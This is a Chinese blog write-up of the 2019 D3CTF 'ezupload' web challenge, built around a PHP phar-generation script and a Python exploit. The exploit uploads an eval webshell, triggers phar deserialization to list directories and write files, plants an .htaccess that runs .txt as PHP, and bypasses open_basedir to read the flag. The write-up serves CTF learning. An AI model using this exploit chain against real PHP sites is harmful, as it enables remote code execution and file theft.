2019 D3CTF ezupload题解

最新推荐文章于 2024-05-04 14:19:40 发布
最新推荐文章于 2024-05-04 14:19:40 发布
阅读量1.2k 收藏 2
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43085611/article/details/119717608
版权

0 前言

一个 PHP 反序列化的题目。虽然序列化的的利用链简单,但是还是踩了很多坑。

1 题解

  • 序列化脚本:serialize.php
<?php

class dir{
    public $userdir;
    public $url;
    public $filename;
}

$o = new dir();
$tmp = new dir(); 
$tmp->userdir = $argv[1]; // 需要扫描的目录
$o->userdir = $tmp;
$o->filename = $argv[2]; // 写入文件的目录

@unlink("phar.phar");
$phar = new Phar("phar.phar");
$phar->startBuffering(); 
$phar->setStub('__HALT_COMPILER();'); // stub
$phar->setMetadata($o); // meta
$phar->addFromString('tmp.txt', ''); // file
$phar->stopBuffering();

echo 'data:text/plain;base64,'.shell_exec('base64 phar.phar');
  • exp.py
import os
from urllib.parse import quote
import requests
import re

url='http://b5ed8b22-1f82-42ce-a311-fbc0bda85341.node4.buuoj.cn:81/'

# 上传一句话
b64 = os.popen('php serialize.php ../ ""').read().strip()
r = requests.post(
    url=url,
    data={
        'action':'upload',
        'filename':'<?php eval($_GET[cmd])?>.txt',
        'url':b64
    },
    # proxies={
    #     'http':'http://127.0.0.1:8080'
    # }
)
print('[*](上传一句话文件):', r.text)
upload_dir = re.findall(r'your file in : (.+)', r.text)[0]
print(upload_dir)

# 读取上一级目录
b64 = os.popen('php serialize.php ../ 123').read().strip()
r = requests.post(
    url=url,
    data={
        'action':'upload',
        'filename':'phar.txt',
        'url':b64
    },
    # proxies={
    #     'http':'http://127.0.0.1:8080'
    # }
)
print('[*]:', r.text)

r = requests.post(
    url=url,
    data={
        'action':'upload',
        'filename':'',
        'url':f'phar://{upload_dir}/phar.txt'
    },
    # proxies={
    #     'http':'http://127.0.0.1:8080'
    # }
)
print('[*](读取上一级目录):', r.text)
dir_name = re.findall(r'\.\. (.+?)your', r.text)[0]
print(dir_name)

# 写文件
b64 = os.popen(f'php serialize.php {upload_dir} /var/www/html/{dir_name}/{upload_dir}/webshell').read().strip()
r = requests.post(
    url=url,
    data={
        'action':'upload',
        'filename':'phar.txt',
        'url':b64
    },
    # proxies={
    #     'http':'http://127.0.0.1:8080'
    # }
)
print(f'php serialize.php {upload_dir} /var/www/html/{dir_name}/{upload_dir}/slug01sh')
print('[*](上传一句话phar文件):', r.text)

r = requests.post(
    url=url,
    data={
        'action':'upload',
        'filename':'',
        'url':f'phar://{upload_dir}/phar.txt'
    },
    # proxies={
    #     'http':'http://127.0.0.1:8080'
    # }
)
print('[*]:', r.text)


# 6. 写入 htaccess
r = requests.post(
    url=url,
    data={
        'action':'upload',
        'filename':'.htaccess',
        'url':'data:image/png;base64,QWRkSGFuZGxlciBwaHA3LXNjcmlwdCAudHh0'
    },
    # proxies={
    #     'http':'http://127.0.0.1:8080'
    # }
)
print('[*]:', r.text)

# 6 测试是否写入成功
r = requests.get(
    url=url + f"{upload_dir}/webshell.txt?cmd=ini_set('open_basedir', '..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir', '/');var_dump(file_get_contents('/F1aG_1s_H4r4'));"
)
# print('[*]:', r.text)
print(r.url)
print(r.text)

将 php 文件和 Python 文件放入相同的目录下,然后执行 python3 exp.py 即可 getflag。

2 收获

2.1 .htaccess

题目中过滤了 type 关键字,导致常用的 .htaccess 无法使用。

AddType application/x-httpd-php .txt

解决办法:考虑修改为另一种写法

AddHandler php7-script .txt

当然很多绕过方法,都是类似的思想,根据一个具体的目标寻找代替物。

2.2 反序列化的工作路径

在这题中,首先利用了文件自带的 upload 功能来写入文件,程序的工作路径在代码所在的文件夹,所以 upload 时可以利用相对路径来写入文件。

但在后面需要利用 destruct 的 file_put_content 来写入文件,反序列化时程序的工作路径在根目录,所以无法直接使用相对路径来写入文件。

3 总结

在文件相关的函数中,相对路径和绝对路径都最好尝试一下,可能会有意想不到的收获。

chiehw
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[2019EIS高校运维赛]ezupload
xlcvv的博客
04-17 3144
ezupload ezbypass 一、ezupload 先来一个之前的思路 随意输入username和oassword: 又试了一下万能密码,也是login failed,那就想到了sql注入,抓包另存为txt文件: 用username做注入点,失败。看了大佬的wp后才知道,网页源码下有个小提示: 下载下来,是个swp文件: swp文件是文件在编辑的过程中,由于不正当结束,会存在修...
buu刷题记录 [D3CTF 2019]EzUpload
weixin_51458899的博客
04-08 1686
[D3CTF 2019]EzUpload © 参考[D3CTF 2019]EzUpload(phar反序列化/.htaccess+phar关键字绕过) | (guokeya.github.io) 参考[D3CTF 2019]EzUpload - 简书 (jianshu.com) 参考2019 D3CTF ezupload题解_slug01sh的博客-CSDN博客 代码审计,很快发现htaccess,phar没有过滤,试图挖链子发现可以! 链子并转为phar <?php class dir{
D3CTF2024
最新发布
qq_61670993的博客
05-04 902
失败如我
[D3CTF 2019]EzUpload 84
shinygod的博客
03-30 662
知识点:phar反序列化,.htaccess phar反序列化 这篇讲的非常细:[https://www.cnblogs.com/zzjdbk/p/13030571.html] 原理 phar://可以解析一个phar的php打包程序,且phar打包程序里有我们的shell。 那么phar打包文件怎么生成呢? 只要访问页面,就可以通过下面这个来生成一个.phar。 <?php #要把php.ini中的phar.readonly设置成Off,不然无法生成phar文件 class TestObj
[D3CTF 2019]EzUpload gzip压缩phar .htaccess内容正则绕过 glob://爆破目录 绕过open_basedir
a3320315的博客
02-21 1595
源码 <?php class dir{ public $userdir; public $url; public $filename; public function __construct($url,$filename) { $this->userdir = "upload/" . md5($_SERVER["HTTP_X_REAL_I...
【PolarCTF】ezupload
m0_73818758的博客
09-24 442
将Content-Disposition: form-data;得到flag为:flag{ffffffffllllaaggg_!
D3CTF2022-官方WriteUp1
08-03
"D3CTF2022-官方WriteUp1" 本文将对 D3CTF 2022 官方 WriteUp1 进行总结,主要涉及 MySQL UDF 提权、Java 反序列化、MySQLInject、Web 短链技术等多方面的知识点。 1. MySQL UDF 提权 在 MySQL 中,可以使用 User...
2019领航杯CTF题目
11-25
2019领航杯CTF的原题,文件恢复和DNS两题没有
CyBRICS CTF Quals 2019 Web 题解1
08-04
在CyBRICS CTF Quals 2019的Web挑战中,参赛者遇到了一系列涉及前端、后端以及加密解密的问题。以下是针对题目提供的部分解题思路和知识点的详细说明: 1. **Warmup**: - **URL重定向**:这个挑战中,网站最初...
D3CTF2021-d3dev
11-05
附件
D^3CTF 2019 Challenges.zip
08-16
D^3CTF 2019 CTF
ezupload:yii ezupload 文件系统
06-10
#ezupload档案上传系统 ezupload档案上传系统是一个简易的档案上传系统,提供了使用者注册与上传并管理自己档案功能,而管理者也可以轻易的管理所有上传的档案,该系统可以快速的建立并应用于研讨会论文上传管理或学生专题档案上传管理之用。 ##建置教学 php版本需要5.4以上 下载压缩档后解压缩放置您的网站目录,如/var/www/html 修改档案目录权限为可以读写,其目录为<your>/web 开启终端机输入以下指令安装系统需要的套件composer install 修改资料库连线设定,开启<your>/config/db.php设定资料库连线ip、资料库名称、使用者帐号与密码 开启终端机进入专案目录,输入以下指令系统会自动建置资料表单./yii migrate 修改档案目录权限为可以读写,其目录为<your project
[UUCTF 2022 新生赛]ez_upload
weixin_67565639的博客
12-23 1211
a. .user.ini是php的一种配置文件,众所周知php.ini是php的配置文件,它可以做到显示报错,导入扩展,文件解析,web站点路径等等设置自 PHP 5.3.0 起,PHP 支持基于每个目录的 .htaccess 风格的 INI 文件。手册中的每个指令都有其所属的模式。大致原理就是上传一个配置文件,配置文件中的意思就是让每一个php文件都包含一个你指定的文件(可以是任意后缀),被包含的文件都会用PHP执行。a.可以上传 ini文件,且上传之后文件不被修改,必须为 .user.ini文件名。
ctf-第五周 | Easy upload
qq_29566629的博客
02-10 702
知识点: 要成功上传才能得到提示。 filename是文件格式 Content-type 是文件类型 要求文件内容里有什么内容,可以使用burp里的repeater直接进行增删改查。
ctf练习之Easy upload
SDM_JH的博客
08-07 2592
一、进入目标站点,查看网页源码,发现上传后缀白名单。 二、先上传一个.png的图片看看,得到提示。 三、打开burp suite,设置代理。修改上传的文件名,绕过前端限制,得到新的提示。 四、在图片内容的中间位置插入内容,得到flag ...
i春秋 web 简单的招聘系统(sql注入)、ezupload(upload)
H4ppyD0g的博客
02-29 797
简单的招聘系统(sql注入) 登录界面可以使用万能密码登录1' or 1=1;# 然后再search for key模块进行盲注(我不会。。。) 看wp,有的人是直接在登录界面进行sql盲注 1' or (ascii(substr((select(group_concat(flaaag))from(flag)),1,1))=102)#就可以登录成功,因为or 1时,1就是真值,所以前面不管or什么...
php upload ctf,强网杯CTF防御赛ez_upload Writeup
weixin_35645813的博客
03-17 1100
这是强网杯拟态防御线下赛遇到的web题目,本来是不打算分享Writeup的,但是由于问的人很多,于是这里分享给大家。ez_upload这题算是非常经典的堆叠black trick的题目,算是比较典型的ctf式题目(虽然现在大家都很抵制这样的题目),这里主要是分享Writeup以及我们队在完成题目时的思考流程。ez_upload 思考流程最开始我先描述一下题目逻辑。1、login.php,登陆页面,...
buuctf [Discuz]wooyun-2010-080723
qq_1873822的博客
03-23 1536
漏洞描述 由于php5.3.x版本里php.ini的设置里request_order默认值为GP, 导致$_REQUEST中不再包含$_COOKIE, 我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。 https://www.secpulse.com/archives/2338.html https://www.freebuf.com/articles/web/226207.html 漏洞复现 http://node3.buuoj.cn:28226/install/来安装di
克拉玛依市第一届网络安全技能大赛-团队赛WP
t235336456的博客
11-28 3564
此次比赛偏中等难度,高级中学十三年团队共解出6题,不过还是乱杀 排名第二,还是很开心的团队名称:高级中学十三年解题人:xinyi,糖糖Web1. ezbyp@ss 打开容器以后看到a和b是进行md5碰撞还要使得a≠b构造a和b a=QNKCDZO&b=240610708if (isset($_POST['password'])){ if ((($_POST['password'])>9999999)&&((strlen($_POST['password']))
[D3CTF 2019]EasyWeb
07-28
- *1* *2* [d3ctf easyweb题解](https://blog.csdn.net/weixin_42474164/article/details/116281650)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值